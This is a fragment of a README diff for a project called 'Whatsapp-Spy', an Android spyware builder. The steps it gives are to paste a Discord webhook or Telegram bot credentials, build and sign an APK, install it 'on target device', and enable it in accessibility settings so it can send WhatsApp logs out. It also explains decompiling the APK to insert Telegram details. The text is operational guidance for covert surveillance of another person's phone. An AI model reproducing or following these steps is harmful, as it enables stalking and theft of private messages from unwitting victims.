wellrodrig/Whatsapp-Spy/README.md

 ✔️ You can choose to send logs either through Discord webhooks or the Telegram API.

 ## Instalation
+__Using the builder__
+   * You're gonna need java installed to run this.
+   * Double click on run.bat
+   * Paste your discord webhook url or your telegram bot data
+   * Click on BUILD APK and then SIGN APK (if you want to sign it)
+   * Install on target device.
+   * You __must__ enable it in the accessibility settings.

 1. __Telegram:__
     * Download APK file.
     * To decompile the APK, open it in an APK Editor like [APKToolGUI](https://github.com/AndnixSH/APKToolGUI) or [APK Editor Studio](https://github.com/kefir500/apk-editor-studio).